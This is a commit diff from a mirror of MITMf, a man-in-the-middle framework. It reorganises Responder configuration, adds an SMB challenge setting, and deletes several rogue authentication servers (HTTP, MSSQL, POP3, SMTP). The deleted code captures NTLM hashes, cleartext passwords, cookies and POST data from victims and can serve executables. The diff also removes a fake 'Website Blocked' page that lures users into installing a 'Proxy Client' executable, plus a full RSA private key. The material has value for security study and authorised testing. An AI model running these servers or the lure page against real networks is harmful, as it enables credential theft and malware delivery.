Mirror of https://github.com/byt3bl33d3r/MITMf.git (synced 2025-07-16 10:03:52 -07:00)
All plugins are now modified to support dynamic config file changes
Responder functionality fully restored
This commit is contained in: parent dfa9c9d65e, commit 70ec5a2bbc
50 changed files with 2102 additions and 798 deletions
@@ -21,6 +21,10 @@
 msfport = 8080     #Port to start webserver for exploits
 rpcip = 127.0.0.1
 rpcpass = abc123

+[[SMB]]
+
+#Set a custom challenge
+Challenge = 1122334455667788

 [[DNS]]
@@ -88,46 +92,32 @@
 [Responder]

 #Set these values to On or Off, so you can control which rogue authentication server is turned on.
-SQL = On
-SMB = On
+MSSQL = On
 Kerberos = On
 FTP = On
 POP = On
-##Listen on 25/TCP, 587/TCP
-SMTP = On
-IMAP = On
-HTTP = On
-HTTPS = On
-LDAP = On
+SMTP = On    #Listens on 25/TCP, 587/TCP
+IMAP = On
+LDAP = On

-#Set a custom challenge
-Challenge = 1122334455667788
-
-#Set this to change the default logging file
-SessionLog = Responder-Session.log
-
-#Set this option with your in-scope targets (default = All). Example: RespondTo = 10.20.1.116,10.20.1.117,10.20.1.118,10.20.1.119
-#RespondTo = 10.20.1.116,10.20.1.117,10.20.1.118,10.20.1.119
+#Set this option with your in-scope targets (default = All)
+#Ex. RespondTo = 10.20.1.116,10.20.1.117,10.20.1.118,10.20.1.119
 RespondTo =
-#Set this option with specific NBT-NS/LLMNR names to answer to (default = All). Example: RespondTo = WPAD,DEV,PROD,SQLINT
-#RespondTo = WPAD,DEV,PROD,SQLINT
+#Set this option with specific NBT-NS/LLMNR names to answer to (default = All)
+#Ex. RespondTo = WPAD,DEV,PROD,SQLINT
 RespondToName =

 #DontRespondTo = 10.20.1.116,10.20.1.117,10.20.1.118,10.20.1.119
 DontRespondTo =
-#Set this option with specific NBT-NS/LLMNR names not to respond to (default = None). Example: DontRespondTo = NAC, IPS, IDS
+#Set this option with specific NBT-NS/LLMNR names not to respond to (default = None)
+#Ex. DontRespondTo = NAC, IPS, IDS
 DontRespondToName =

 #Set your custom PAC script
 WPADScript = 'function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "127.0.0.1") || isPlainHostName(host)) return "DIRECT"; if (dnsDomainIs(host, "RespProxySrv")||shExpMatch(host, "(*.RespProxySrv|RespProxySrv)")) return "DIRECT"; return "PROXY ISAProxySrv:3141; DIRECT";}'

-[[HTTPS Server]]
-
-#Change to use your certs
-cert = config/responder/certs/responder.crt
-key = config/responder/certs/responder.key
-
 [BeEFAutorun]
 #Example config for the BeefAutorun plugin
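For reference, a minimal sketch (not part of this commit) of how the relocated settings can be read with ConfigObj; the ["MITMf"]["SMB"]["Challenge"] key path matches the SMB.py hunk further down, the rest is illustrative:

    from configobj import ConfigObj

    config = ConfigObj("./config/mitmf.conf")
    challenge  = config["MITMf"]["SMB"]["Challenge"]   # "1122334455667788" unless overridden
    respond_to = config["Responder"]["RespondTo"]      # '' when unset; ConfigObj parses "a,b,c" into a list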
@@ -1,31 +0,0 @@
<html>
<head>
<title>Website Blocked: ISA Proxy Server</title>
<style>
<!--
body, ul, li { font-family:Arial, Helvetica, sans-serif; font-size:14px; color:#737373; margin:0; padding:0;}
.content { padding: 20px 15px 15px 40px; width: 500px; margin: 70px auto 6px auto; border: #D52B1E solid 2px;}
.blocking { border-top: #D52B1E solid 2px; border-bottom: #D52B1E solid 2px;}
.title { font-size: 24px; border-bottom: #ccc solid 1px; padding-bottom:15px; margin-bottom:15px;}
.details li { list-style: none; padding: 4px 0;}
.footer { color: #6d90e7; font-size: 14px; width: 540px; margin: 0 auto; text-align:right; }
-->
</style>

</head>
<body>
<center>
<div class="content blocking">
<div class="title" id="msg_title"><b>New Security Policy: Website Blocked</b></div>
<ul class="details">
<div id="main_block">
<div id="msg_long_reason">
<li><b>Access has been blocked. Please download and install the new </b><span class="url"><a href="http://isaProxysrv/ProxyClient.exe"><b>Proxy Client</b></a></span><b> in order to access internet resources.</b></li>
</div>
</ul>
</div>
<div class="footer">ISA Security <b>Proxy Server</b></div>
</center>
</body>
</html>
Binary file not shown.
@@ -1,2 +0,0 @@
#!/bin/bash
openssl genrsa -des3 -out responder.tmp.key 2048&&openssl rsa -in responder.tmp.key -out responder.key&&openssl req -new -key responder.key -out responder.csr&&openssl x509 -req -days 365 -in responder.csr -signkey responder.key -out responder.crt&&rm responder.tmp.key responder.csr
@@ -1,19 +0,0 @@
-----BEGIN CERTIFICATE-----
MIIDBjCCAe4CCQDDe8Sb2PGjITANBgkqhkiG9w0BAQUFADBFMQswCQYDVQQGEwJB
VTETMBEGA1UECAwKU29tZS1TdGF0ZTEhMB8GA1UECgwYSW50ZXJuZXQgV2lkZ2l0
cyBQdHkgTHRkMB4XDTEzMDIyODIwMTcxN1oXDTE0MDIyODIwMTcxN1owRTELMAkG
A1UEBhMCQVUxEzARBgNVBAgMClNvbWUtU3RhdGUxITAfBgNVBAoMGEludGVybmV0
IFdpZGdpdHMgUHR5IEx0ZDCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEB
AMQB5yErm0Sg7sRQbLgbi/hG/8uF2xUzvVKnT4LROEWkkimy9umb2JbvAZITDvSs
r2xsPA4VoxFjKpWLOv7mAIMBR95NDWsTLuR36Sho/U2LlTlUBdSfQP7rlKQZ0L43
YpXswdvCCJ0wP2yOhq0i71cg/Nk9mfQxftpgGUxoa+6ljU9hSdmThu2FVgAbSpNl
D86rk4K9/sGYAY4btMqaMzC7JIKZp07FHL32oM01cKbRoNg2eUuQmoVjca1pkmbO
Y8qnl7ajOjsiAPQnt/2TMJlRsdoU1fSx76Grgkm8D4gX/pBUqELdpvHtnm/9imPl
qNGL5LaW8ARgG16U0mRhutkCAwEAATANBgkqhkiG9w0BAQUFAAOCAQEAS7u4LWc9
wDPThD0o58Ti2GgIs+mMRx5hPaxWHJNCu+lwFqjvWmsNFfHoSzlIkIUjtlV2G/wE
FxDSPlc/V+r7U2UiE7WSqQiWdmfOYS2m03x4SN0Vzf/n9DeApyPo2GsXGrha20eN
s390Xwj6yKFdprUPJ8ezlEVRrAMv7tu1cOLzqmkocYKnPgXDdQxiiGisp7/hEUCQ
B7HvNCMPbOi+M7O/CXbfgnTD029KkyiR2LEtj4QC5Ytp/pj0UyyoIeCK57CTB3Jt
X3CZ+DiphTpOca4iENH55m6atk+WHYwg3ClYiONQDdIgKVT3BK0ITjyFWZeTneVu
1eVgF/UkX9fqJg==
-----END CERTIFICATE-----
@@ -1,27 +0,0 @@
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAxAHnISubRKDuxFBsuBuL+Eb/y4XbFTO9UqdPgtE4RaSSKbL2
6ZvYlu8BkhMO9KyvbGw8DhWjEWMqlYs6/uYAgwFH3k0NaxMu5HfpKGj9TYuVOVQF
1J9A/uuUpBnQvjdilezB28IInTA/bI6GrSLvVyD82T2Z9DF+2mAZTGhr7qWNT2FJ
2ZOG7YVWABtKk2UPzquTgr3+wZgBjhu0ypozMLskgpmnTsUcvfagzTVwptGg2DZ5
S5CahWNxrWmSZs5jyqeXtqM6OyIA9Ce3/ZMwmVGx2hTV9LHvoauCSbwPiBf+kFSo
Qt2m8e2eb/2KY+Wo0YvktpbwBGAbXpTSZGG62QIDAQABAoIBABbuLg74XgLKXQSE
cCOdvWM/Ux+JOlchpW1s+2VPeqjTFvJf6Hjt7YnCzkk7h41iQmeJxgDT0S7wjgPO
tQkq+TZaSQEdvIshRGQgDxvWJIQU51E8ni4Ar4bjIpGMH5qROixV9VvzODTDdzgI
+IJ6ystDpbD4fvFNdQyxH2SL9syFRyWyxY3vWB0C/OHWxGFtiTtmeivBSmpxl0RY
RQqPLxX+xUCie7U6ud3e37FO7cKt+YT8lWKhGHKJlTlJbHs1d8crzp6qKJLl+ibB
0fB6D6E5M1fnIJFJULIYAG5bEak90KuKOKCLoKLG+rq0vUvJsb9vNCAA6rh1ra+n
8woY8TECgYEA7CEE/3oWnziB3PZoIIJDgbBalCCbA+/SgDiSvYJELEApCMj8HYc5
UGOxrfVhPmbHRUI982Fj1oM3QBEX0zpkOk7Xk224RXwBHG8MMPQmTMVp+o06AI6D
Nggyam9v5KLNMj5KghKJSOD0tR5YxsZPXw4gAI+wpqu3bXGKZ8bRpvUCgYEA1ICJ
H+kw6H8edJHGdNH+X6RR0DIbS11XQvbKQ3vh6LdHTofoHqQa3t0zGYCgksKJbtHV
2h3pv+nuOu5FEP2rrGJIforv2zwfJ5vp65jePrSXU+Up4pMHbP1Rm91ApcKNA15U
q3SaclqTjmiqvaeSKc4TDjdb/rUaIhyIgbg97dUCgYAcdq5/jVwEvW8KD7nlkU5J
59RDXtrQ0qvxQOCPb5CANQu9P10EwjQqeJoGejnKp+EFfEKzf93lEdQrKORSVguW
68IYx3UbCyOnJcu2avfi8TkhNrzzLDqs3LgXFG/Mg8NwdwnMPCfIXTWiT5IsA+O1
daJt7uRAcxqdWr5wXAsRsQKBgFXU4Q4hm16dUcjVxKoU08D/1wfX5UxolEF4+zOM
yy+7L7MZk/kkYbIY+HXZjYIZz3cSjGVAZdTdgRsOeJknTPsg65UpOz57Jz5RbId7
xHDhcqoxSty4dGxiWV8yW9VYIqr0pBBo1aVQzn7b6fMWxyPZl7rLQ3462iZjDgQP
TfxNAoGBAK/Gef6MgchbFPikOVEX9qB/wt4sS3V7mT6QkqMZZgSkegDLBFVRJX3w
Emx/V2A14p0uHPzn5irURyJ6daZCN4amPAWYQnkiXG8saiBwtfs23A1q7kxnPR+b
KJfb+nDlhU1iYa/7nf4PaR/i9l6gcwOeh1ThK1nq4VvwTaTZKSRh
-----END RSA PRIVATE KEY-----
@@ -13,9 +13,7 @@ class ConfigWatcher(FileSystemEventHandler):

     _instance = None

-    def __init__(self):
-
-        self.config = ConfigObj("./config/mitmf.conf")
+    config = ConfigObj("./config/mitmf.conf")

     @staticmethod
     def getInstance():
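The "dynamic config file changes" in the commit message hinge on this class: ConfigWatcher extends watchdog's FileSystemEventHandler and keeps a parsed copy of mitmf.conf as a class attribute. A hedged, self-contained sketch of that pattern (class name and watch() helper are illustrative, not the project's exact code):

    from configobj import ConfigObj
    from watchdog.observers import Observer
    from watchdog.events import FileSystemEventHandler

    class ConfigWatcherSketch(FileSystemEventHandler):

        config = ConfigObj("./config/mitmf.conf")    # parsed once, as in the hunk above

        def on_modified(self, event):
            # watchdog fires this when anything under the watched path changes;
            # re-parse so every reader of .config sees the new values
            ConfigWatcherSketch.config = ConfigObj("./config/mitmf.conf")

        def watch(self):
            observer = Observer()
            observer.schedule(self, path="./config", recursive=False)
            observer.start()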
@@ -416,6 +416,7 @@ class ThreadedTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
 class DNSChef(ConfigWatcher):

     _instance = None
+    version = "0.4"

     tcp = False
     ipv6 = False
@@ -45,6 +45,8 @@ http_search_re = '((search|query|&q|\?q|search\?p|searchterm|keywords|keyword|co
 class NetCreds:

+    version = "1.0"
+
     def sniffer(self, myip, interface):
         #set the filter to our ip to prevent capturing traffic coming/going from our box
         sniff(iface=interface, prn=pkt_parser, filter="not host {}".format(myip), store=0)
@@ -1,240 +0,0 @@
##################################################################################
#HTTP Proxy Stuff starts here (Not Used)
##################################################################################

class HTTPProxy():

    def serve_thread_tcp(host, port, handler):
        try:
            server = ThreadingTCPServer((host, port), handler)
            server.serve_forever()
        except Exception, e:
            print "Error starting TCP server on port %s: %s:" % (str(port),str(e))

    def start(on_off):
        if on_off == "ON":
            t = threading.Thread(name="HTTP", target=self.serve_thread_tcp, args=("0.0.0.0", 80,HTTP))
            t.setDaemon(True)
            t.start()

        if on_off == "OFF":
            return False

class ThreadingTCPServer(ThreadingMixIn, TCPServer):

    allow_reuse_address = 1

    def server_bind(self):
        TCPServer.server_bind(self)

#Parse NTLMv1/v2 hash.
def ParseHTTPHash(data,client):
    LMhashLen = struct.unpack('<H',data[12:14])[0]
    LMhashOffset = struct.unpack('<H',data[16:18])[0]
    LMHash = data[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper()
    NthashLen = struct.unpack('<H',data[20:22])[0]
    NthashOffset = struct.unpack('<H',data[24:26])[0]
    NTHash = data[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
    if NthashLen == 24:
        NtHash = data[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
        HostNameLen = struct.unpack('<H',data[46:48])[0]
        HostNameOffset = struct.unpack('<H',data[48:50])[0]
        Hostname = data[HostNameOffset:HostNameOffset+HostNameLen].replace('\x00','')
        UserLen = struct.unpack('<H',data[36:38])[0]
        UserOffset = struct.unpack('<H',data[40:42])[0]
        User = data[UserOffset:UserOffset+UserLen].replace('\x00','')
        outfile = "./logs/responder/HTTP-NTLMv1-Client-"+client+".txt"
        WriteHash = User+"::"+Hostname+":"+LMHash+":"+NtHash+":"+NumChal
        WriteData(outfile,WriteHash, User+"::"+Hostname)
        responder_logger.info('[+]HTTP NTLMv1 hash captured from :%s'%(client))
        responder_logger.info('[+]HTTP NTLMv1 Hostname is :%s'%(Hostname))
        responder_logger.info('[+]HTTP NTLMv1 User is :%s'%(data[UserOffset:UserOffset+UserLen].replace('\x00','')))
        responder_logger.info('[+]HTTP NTLMv1 Complete hash is :%s'%(WriteHash))

    if NthashLen > 24:
        NthashLen = 64
        DomainLen = struct.unpack('<H',data[28:30])[0]
        DomainOffset = struct.unpack('<H',data[32:34])[0]
        Domain = data[DomainOffset:DomainOffset+DomainLen].replace('\x00','')
        UserLen = struct.unpack('<H',data[36:38])[0]
        UserOffset = struct.unpack('<H',data[40:42])[0]
        User = data[UserOffset:UserOffset+UserLen].replace('\x00','')
        HostNameLen = struct.unpack('<H',data[44:46])[0]
        HostNameOffset = struct.unpack('<H',data[48:50])[0]
        HostName = data[HostNameOffset:HostNameOffset+HostNameLen].replace('\x00','')
        outfile = "./logs/responder/HTTP-NTLMv2-Client-"+client+".txt"
        WriteHash = User+"::"+Domain+":"+NumChal+":"+NTHash[:32]+":"+NTHash[32:]
        WriteData(outfile,WriteHash, User+"::"+Domain)
        responder_logger.info('[+]HTTP NTLMv2 hash captured from :%s'%(client))
        responder_logger.info('[+]HTTP NTLMv2 User is : %s'%(User))
        responder_logger.info('[+]HTTP NTLMv2 Domain is :%s'%(Domain))
        responder_logger.info('[+]HTTP NTLMv2 Hostname is :%s'%(HostName))
        responder_logger.info('[+]HTTP NTLMv2 Complete hash is :%s'%(WriteHash))

def GrabCookie(data,host):
    Cookie = re.search('(Cookie:*.\=*)[^\r\n]*', data)
    if Cookie:
        CookieStr = "[+]HTTP Cookie Header sent from: %s The Cookie is: \n%s"%(host,Cookie.group(0))
        responder_logger.info(CookieStr)
        return Cookie.group(0)
    else:
        NoCookies = "No cookies were sent with this request"
        responder_logger.info(NoCookies)
        return NoCookies

def WpadCustom(data,client):
    Wpad = re.search('(/wpad.dat|/*\.pac)', data)
    if Wpad:
        buffer1 = WPADScript(Payload=WPAD_Script)
        buffer1.calculate()
        return str(buffer1)
    else:
        return False

def WpadForcedAuth(Force_WPAD_Auth):
    if Force_WPAD_Auth == True:
        return True
    if Force_WPAD_Auth == False:
        return False

# Function used to check if we answer with a Basic or NTLM auth.
def Basic_Ntlm(Basic):
    if Basic == True:
        return IIS_Basic_401_Ans()
    else:
        return IIS_Auth_401_Ans()

def ServeEXE(data,client, Filename):
    Message = "[+]Sent %s file sent to: %s."%(Filename,client)
    responder_logger.info(Message)
    with open (Filename, "rb") as bk:
        data = bk.read()
        bk.close()
        return data

def ServeEXEOrNot(on_off):
    if Exe_On_Off == "ON":
        return True
    if Exe_On_Off == "OFF":
        return False

def ServeEXECAlwaysOrNot(on_off):
    if Exec_Mode_On_Off == "ON":
        return True
    if Exec_Mode_On_Off == "OFF":
        return False

def IsExecutable(Filename):
    exe = re.findall('.exe',Filename)
    if exe:
        return True
    else:
        return False

def GrabURL(data, host):
    GET = re.findall('(?<=GET )[^HTTP]*', data)
    POST = re.findall('(?<=POST )[^HTTP]*', data)
    POSTDATA = re.findall('(?<=\r\n\r\n)[^*]*', data)
    if GET:
        HostStr = "[+]HTTP GET request from : %s. The HTTP URL requested was: %s"%(host, ''.join(GET))
        responder_logger.info(HostStr)
        #print HostStr

    if POST:
        Host3Str = "[+]HTTP POST request from : %s. The HTTP URL requested was: %s"%(host,''.join(POST))
        responder_logger.info(Host3Str)
        #print Host3Str
        if len(''.join(POSTDATA)) >2:
            PostData = '[+]The HTTP POST DATA in this request was: %s'%(''.join(POSTDATA).strip())
            #print PostData
            responder_logger.info(PostData)

#Handle HTTP packet sequence.
def PacketSequence(data,client):
    Ntlm = re.findall('(?<=Authorization: NTLM )[^\\r]*', data)
    BasicAuth = re.findall('(?<=Authorization: Basic )[^\\r]*', data)

    if ServeEXEOrNot(Exe_On_Off) and re.findall('.exe', data):
        File = config.get('HTTP Server', 'ExecFilename')
        buffer1 = ServerExeFile(Payload = ServeEXE(data,client,File),filename=File)
        buffer1.calculate()
        return str(buffer1)

    if ServeEXECAlwaysOrNot(Exec_Mode_On_Off):
        if IsExecutable(FILENAME):
            buffer1 = ServeAlwaysExeFile(Payload = ServeEXE(data,client,FILENAME),ContentDiFile=FILENAME)
            buffer1.calculate()
            return str(buffer1)
        else:
            buffer1 = ServeAlwaysNormalFile(Payload = ServeEXE(data,client,FILENAME))
            buffer1.calculate()
            return str(buffer1)

    if Ntlm:
        packetNtlm = b64decode(''.join(Ntlm))[8:9]
        if packetNtlm == "\x01":
            GrabURL(data,client)
            GrabCookie(data,client)
            r = NTLM_Challenge(ServerChallenge=Challenge)
            r.calculate()
            t = IIS_NTLM_Challenge_Ans()
            t.calculate(str(r))
            buffer1 = str(t)
            return buffer1
        if packetNtlm == "\x03":
            NTLM_Auth= b64decode(''.join(Ntlm))
            ParseHTTPHash(NTLM_Auth,client)
            if WpadForcedAuth(Force_WPAD_Auth) and WpadCustom(data,client):
                Message = "[+]WPAD (auth) file sent to: %s"%(client)
                if Verbose:
                    print Message
                responder_logger.info(Message)
                buffer1 = WpadCustom(data,client)
                return buffer1
            else:
                buffer1 = IIS_Auth_Granted(Payload=HTMLToServe)
                buffer1.calculate()
                return str(buffer1)

    if BasicAuth:
        GrabCookie(data,client)
        GrabURL(data,client)
        outfile = "./logs/responder/HTTP-Clear-Text-Password-"+client+".txt"
        WriteData(outfile,b64decode(''.join(BasicAuth)), b64decode(''.join(BasicAuth)))
        responder_logger.info('[+]HTTP-User & Password: %s'%(b64decode(''.join(BasicAuth))))
        if WpadForcedAuth(Force_WPAD_Auth) and WpadCustom(data,client):
            Message = "[+]WPAD (auth) file sent to: %s"%(client)
            if Verbose:
                print Message
            responder_logger.info(Message)
            buffer1 = WpadCustom(data,client)
            return buffer1
        else:
            buffer1 = IIS_Auth_Granted(Payload=HTMLToServe)
            buffer1.calculate()
            return str(buffer1)

    else:
        return str(Basic_Ntlm(Basic))

#HTTP Server Class
class HTTP(BaseRequestHandler):

    def handle(self):
        try:
            while True:
                self.request.settimeout(1)
                data = self.request.recv(8092)
                buff = WpadCustom(data,self.client_address[0])
                if buff and WpadForcedAuth(Force_WPAD_Auth) == False:
                    Message = "[+]WPAD (no auth) file sent to: %s"%(self.client_address[0])
                    if Verbose:
                        print Message
                    responder_logger.info(Message)
                    self.request.send(buff)
                else:
                    buffer0 = PacketSequence(data,self.client_address[0])
                    self.request.send(buffer0)
        except Exception:
            pass#No need to be verbose..
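A side note on the PacketSequence() logic in the deleted file above: the b64decode(...)[8:9] check works because every NTLMSSP token starts with the 8-byte signature "NTLMSSP\0" followed by a 4-byte little-endian message type (1 = NEGOTIATE, 2 = CHALLENGE, 3 = AUTHENTICATE). A standalone illustration:

    from base64 import b64encode, b64decode

    # minimal NTLM NEGOTIATE header: 8-byte "NTLMSSP\0" signature + little-endian message type 1
    token = b64encode(b"NTLMSSP\x00" + b"\x01\x00\x00\x00")
    assert b64decode(token)[8:9] == b"\x01"   # the same test PacketSequence performs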
@@ -1,128 +0,0 @@
import struct

class MSSQLServer():

    def serve_thread_tcp(host, port, handler):
        try:
            server = ThreadingTCPServer((host, port), handler)
            server.serve_forever()
        except Exception, e:
            print "Error starting TCP server on port %s: %s:" % (str(port),str(e))

    def start(SQL_On_Off):
        if SQL_On_Off == "ON":
            t = threading.Thread(name="MSSQL", target=self.serve_thread_tcp, args=("0.0.0.0", 1433,MSSQL))
            t.setDaemon(True)
            t.start()
            return t
        if SQL_On_Off == "OFF":
            return False

class ThreadingTCPServer(ThreadingMixIn, TCPServer):

    allow_reuse_address = True

    def server_bind(self):
        TCPServer.server_bind(self)

#This function parse SQL NTLMv1/v2 hash and dump it into a specific file.
def ParseSQLHash(data,client):
    SSPIStart = data[8:]
    LMhashLen = struct.unpack('<H',data[20:22])[0]
    LMhashOffset = struct.unpack('<H',data[24:26])[0]
    LMHash = SSPIStart[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper()
    NthashLen = struct.unpack('<H',data[30:32])[0]
    if NthashLen == 24:
        NthashOffset = struct.unpack('<H',data[32:34])[0]
        NtHash = SSPIStart[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
        DomainLen = struct.unpack('<H',data[36:38])[0]
        DomainOffset = struct.unpack('<H',data[40:42])[0]
        Domain = SSPIStart[DomainOffset:DomainOffset+DomainLen].replace('\x00','')
        UserLen = struct.unpack('<H',data[44:46])[0]
        UserOffset = struct.unpack('<H',data[48:50])[0]
        User = SSPIStart[UserOffset:UserOffset+UserLen].replace('\x00','')
        outfile = "./logs/responder/MSSQL-NTLMv1-Client-"+client+".txt"
        WriteData(outfile,User+"::"+Domain+":"+LMHash+":"+NtHash+":"+NumChal, User+"::"+Domain)
        responder_logger.info('[+]MsSQL NTLMv1 hash captured from :%s'%(client))
        responder_logger.info('[+]MSSQL NTLMv1 User is :%s'%(SSPIStart[UserOffset:UserOffset+UserLen].replace('\x00','')))
        responder_logger.info('[+]MSSQL NTLMv1 Domain is :%s'%(Domain))
        responder_logger.info('[+]MSSQL NTLMv1 Complete hash is: %s'%(User+"::"+Domain+":"+LMHash+":"+NtHash+":"+NumChal))
    if NthashLen > 60:
        DomainLen = struct.unpack('<H',data[36:38])[0]
        NthashOffset = struct.unpack('<H',data[32:34])[0]
        NthashLen = struct.unpack('<H',data[30:32])[0]
        Hash = SSPIStart[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
        DomainOffset = struct.unpack('<H',data[40:42])[0]
        Domain = SSPIStart[DomainOffset:DomainOffset+DomainLen].replace('\x00','')
        UserLen = struct.unpack('<H',data[44:46])[0]
        UserOffset = struct.unpack('<H',data[48:50])[0]
        User = SSPIStart[UserOffset:UserOffset+UserLen].replace('\x00','')
        outfile = "./logs/responder/MSSQL-NTLMv2-Client-"+client+".txt"
        Writehash = User+"::"+Domain+":"+NumChal+":"+Hash[:32].upper()+":"+Hash[32:].upper()
        WriteData(outfile,Writehash,User+"::"+Domain)
        responder_logger.info('[+]MsSQL NTLMv2 hash captured from :%s'%(client))
        responder_logger.info('[+]MSSQL NTLMv2 Domain is :%s'%(Domain))
        responder_logger.info('[+]MSSQL NTLMv2 User is :%s'%(SSPIStart[UserOffset:UserOffset+UserLen].replace('\x00','')))
        responder_logger.info('[+]MSSQL NTLMv2 Complete Hash is : %s'%(Writehash))

def ParseSqlClearTxtPwd(Pwd):
    Pwd = map(ord,Pwd.replace('\xa5',''))
    Pw = []
    for x in Pwd:
        Pw.append(hex(x ^ 0xa5)[::-1][:2].replace("x","0").decode('hex'))
    return ''.join(Pw)

def ParseClearTextSQLPass(Data,client):
    outfile = "./logs/responder/MSSQL-PlainText-Password-"+client+".txt"
    UsernameOffset = struct.unpack('<h',Data[48:50])[0]
    PwdOffset = struct.unpack('<h',Data[52:54])[0]
    AppOffset = struct.unpack('<h',Data[56:58])[0]
    PwdLen = AppOffset-PwdOffset
    UsernameLen = PwdOffset-UsernameOffset
    PwdStr = ParseSqlClearTxtPwd(Data[8+PwdOffset:8+PwdOffset+PwdLen])
    UserName = Data[8+UsernameOffset:8+UsernameOffset+UsernameLen].decode('utf-16le')
    WriteData(outfile,UserName+":"+PwdStr,UserName+":"+PwdStr)
    responder_logger.info('[+]MSSQL PlainText Password captured from :%s'%(client))
    responder_logger.info('[+]MSSQL Username: %s Password: %s'%(UserName, PwdStr))

def ParsePreLoginEncValue(Data):
    PacketLen = struct.unpack('>H',Data[2:4])[0]
    EncryptionValue = Data[PacketLen-7:PacketLen-6]
    if re.search("NTLMSSP",Data):
        return True
    else:
        return False

#MS-SQL server class.
class MSSQL(BaseRequestHandler):

    def handle(self):
        try:
            while True:
                data = self.request.recv(1024)
                self.request.settimeout(0.1)
                ##Pre-Login Message
                if data[0] == "\x12":
                    buffer0 = str(MSSQLPreLoginAnswer())
                    self.request.send(buffer0)
                    data = self.request.recv(1024)
                ##NegoSSP
                if data[0] == "\x10":
                    if re.search("NTLMSSP",data):
                        t = MSSQLNTLMChallengeAnswer(ServerChallenge=Challenge)
                        t.calculate()
                        buffer1 = str(t)
                        self.request.send(buffer1)
                        data = self.request.recv(1024)
                    else:
                        ParseClearTextSQLPass(data,self.client_address[0])
                ##NegoSSP Auth
                if data[0] == "\x11":
                    ParseSQLHash(data,self.client_address[0])
        except Exception:
            pass
        self.request.close()

##################################################################################
#SQL Stuff ends here
##################################################################################
@@ -1,69 +0,0 @@
##################################################################################
#POP3 Stuff starts here
##################################################################################

class POP3Server():

    def serve_thread_tcp(host, port, handler):
        try:
            server = ThreadingTCPServer((host, port), handler)
            server.serve_forever()
        except Exception, e:
            print "Error starting TCP server on port %s: %s:" % (str(port),str(e))

    #Function name self-explanatory
    def start(POP_On_Off):
        if POP_On_Off == "ON":
            t = threading.Thread(name="POP", target=serve_thread_tcp, args=("0.0.0.0", 110,POP))
            t.setDaemon(True)
            t.start()
            return t
        if POP_On_Off == "OFF":
            return False

class ThreadingTCPServer(ThreadingMixIn, TCPServer):

    allow_reuse_address = 1

    def server_bind(self):
        TCPServer.server_bind(self)


class POPOKPacket(Packet):
    fields = OrderedDict([
        ("Code", "+OK"),
        ("CRLF", "\r\n"),
    ])

#POP3 server class.
class POP(BaseRequestHandler):

    def handle(self):
        try:
            self.request.send(str(POPOKPacket()))
            data = self.request.recv(1024)
            if data[0:4] == "USER":
                User = data[5:].replace("\r\n","")
                responder_logger.info('[+]POP3 User: %s'%(User))
                t = POPOKPacket()
                self.request.send(str(t))
                data = self.request.recv(1024)
            if data[0:4] == "PASS":
                Pass = data[5:].replace("\r\n","")
                Outfile = "./logs/responder/POP3-Clear-Text-Password-"+self.client_address[0]+".txt"
                WriteData(Outfile,User+":"+Pass, User+":"+Pass)
                #print "[+]POP3 Credentials from %s. User/Pass: %s:%s "%(self.client_address[0],User,Pass)
                responder_logger.info("[+]POP3 Credentials from %s. User/Pass: %s:%s "%(self.client_address[0],User,Pass))
                t = POPOKPacket()
                self.request.send(str(t))
                data = self.request.recv(1024)
            else :
                t = POPOKPacket()
                self.request.send(str(t))
                data = self.request.recv(1024)
        except Exception:
            pass

##################################################################################
#POP3 Stuff ends here
##################################################################################
@@ -1,7 +1,8 @@
 import logging
 import sys
 import threading
-from impacket import smbserver, LOG
+from impacket import version, smbserver, LOG
+from core.configwatcher import ConfigWatcher

 LOG.setLevel(logging.INFO)
 LOG.propagate = False
@@ -16,11 +17,14 @@ streamHandler.setFormatter(formatter)
 LOG.addHandler(fileHandler)
 LOG.addHandler(streamHandler)

-class SMBserver:
+class SMBserver(ConfigWatcher):

+    impacket_ver = version.VER_MINOR
+
     def __init__(self, listenAddress = '0.0.0.0', listenPort=445, configFile=''):

         self.server = smbserver.SimpleSMBServer(listenAddress, listenPort, configFile)
+        self.server.setSMBChallenge(self.config["MITMf"]["SMB"]["Challenge"])

     def start(self):
         t = threading.Thread(name='SMBserver', target=self.server.start)
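The calls used in this hunk belong to impacket's SimpleSMBServer API; a hedged usage sketch (the config-file path and the literal challenge below are placeholders, not values taken from this commit):

    from impacket import smbserver

    server = smbserver.SimpleSMBServer("0.0.0.0", 445, "./config/smb.conf")  # config path is a placeholder
    server.setSMBChallenge("1122334455667788")  # the call the patched SMBserver feeds from mitmf.conf
    server.start()  # blocks; MITMf wraps it in a daemon thread (see start() above)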
@@ -1,63 +0,0 @@
##################################################################################
#ESMTP Stuff starts here
##################################################################################

class SMTP():

    def serve_thread_tcp(self, host, port, handler):
        try:
            server = ThreadingTCPServer((host, port), handler)
            server.serve_forever()
        except Exception, e:
            print "Error starting TCP server on port %s: %s:" % (str(port),str(e))

    #Function name self-explanatory
    def start(self, SMTP_On_Off):
        if SMTP_On_Off == "ON":
            t1 = threading.Thread(name="ESMTP-25", target=self.serve_thread_tcp, args=("0.0.0.0", 25,ESMTP))
            t2 = threading.Thread(name="ESMTP-587", target=self.serve_thread_tcp, args=("0.0.0.0", 587,ESMTP))

            for t in [t1, t2]:
                t.setDaemon(True)
                t.start()

        if SMTP_On_Off == "OFF":
            return False

class ThreadingTCPServer(ThreadingMixIn, TCPServer):

    allow_reuse_address = 1

    def server_bind(self):
        TCPServer.server_bind(self)

#ESMTP server class.
class ESMTP(BaseRequestHandler):

    def handle(self):
        try:
            self.request.send(str(SMTPGreating()))
            data = self.request.recv(1024)
            if data[0:4] == "EHLO":
                self.request.send(str(SMTPAUTH()))
                data = self.request.recv(1024)
            if data[0:4] == "AUTH":
                self.request.send(str(SMTPAUTH1()))
                data = self.request.recv(1024)
                if data:
                    Username = b64decode(data[:len(data)-2])
                    self.request.send(str(SMTPAUTH2()))
                    data = self.request.recv(1024)
                    if data:
                        Password = b64decode(data[:len(data)-2])
                        Outfile = "./logs/responder/SMTP-Clear-Text-Password-"+self.client_address[0]+".txt"
                        WriteData(Outfile,Username+":"+Password, Username+":"+Password)
